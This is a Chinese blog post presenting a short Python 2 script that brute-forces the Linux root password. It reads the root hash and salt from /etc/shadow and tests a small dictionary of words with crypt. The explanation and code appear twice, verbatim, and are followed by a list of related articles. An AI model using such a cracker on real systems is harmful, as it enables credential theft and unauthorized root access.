字典法暴力破解Linux用户密码
2016-12-15 15:56
766 查看
Linux系列的很多操作系统是采用MD5加密用户密码的,加密的过程是单向的,所以要破解只能采用暴力破解法。
下面分享个程序来破解root用户密码。
程序会遍历字典文件中的每个密码,加密后和/etc/shadow中的密码匹配,如果相同则返回成功。
#!/usr/bin/env python
import crypt
import sys
import re
dic = [
'cookie',
'test',
'fuckyou'
]
passwordfile = '/etc/shadow'
def getrootpass():
f = open(passwordfile, 'r')
for line in f.readlines():
if 'root:' in line :
rootpass = line.split(":")[1]
if rootpass is None:
print "cannot find root user"
sys.exit(1)
return rootpass
def getsalt():
rootpass = getrootpass()
if rootpass:
salt = re.match("(\$1\$.*\$)", rootpass)
if salt != None :
salt = salt.groups(1)[0]
return salt
def crack():
for passwd in dic:
testpass = crypt.crypt(passwd, str(getsalt()))
if testpass == getrootpass():
print "crack root password successful !\n root password is :\n%s" % passwd
sys.exit(0)
print "could not crack root password"
crack()
下面分享个程序来破解root用户密码。
程序会遍历字典文件中的每个密码,加密后和/etc/shadow中的密码匹配,如果相同则返回成功。
#!/usr/bin/env python
import crypt
import sys
import re
dic = [
'cookie',
'test',
'fuckyou'
]
passwordfile = '/etc/shadow'
def getrootpass():
f = open(passwordfile, 'r')
for line in f.readlines():
if 'root:' in line :
rootpass = line.split(":")[1]
if rootpass is None:
print "cannot find root user"
sys.exit(1)
return rootpass
def getsalt():
rootpass = getrootpass()
if rootpass:
salt = re.match("(\$1\$.*\$)", rootpass)
if salt != None :
salt = salt.groups(1)[0]
return salt
def crack():
for passwd in dic:
testpass = crypt.crypt(passwd, str(getsalt()))
if testpass == getrootpass():
print "crack root password successful !\n root password is :\n%s" % passwd
sys.exit(0)
print "could not crack root password"
crack()
相关文章推荐
- Linux安全--防范用户密码被暴力破解
- Linux安全1-用户密码被暴力破解
- Linux用户管理安全宝典:密码防破解与帐号文件保护(二)
- John密码破解 ---- linux用户密码
- 破解linux超级用户密码
- (总结)Linux下的暴力密码在线破解工具Hydra详解
- Linux系统下破解root用户密码
- linux 超级用户密码破解
- 五分钟破解Linux系统根用户ROOT密码
- Linux下的暴力密码在线破解工具Hydra
- Mysql数据库用户密码暴力破解
- Linux下超级用户密码通过grub破解及防护
- 防暴力破解SSH/FTP/SMTP用户密码----fail2ban操作实务
- 用denyhosts防SSH暴力破解用户密码
- linux root用户密码破解
- Linux用户管理安全宝典:密码防破解与帐号文件保护
- Linux用户管理安全宝典:密码防破解与帐号文件保护(一)
- linux单用户密码破解
- Red Hat Linux root 用户密码破解
- 防止Linux暴力ssh破解密码方法denyhosts工具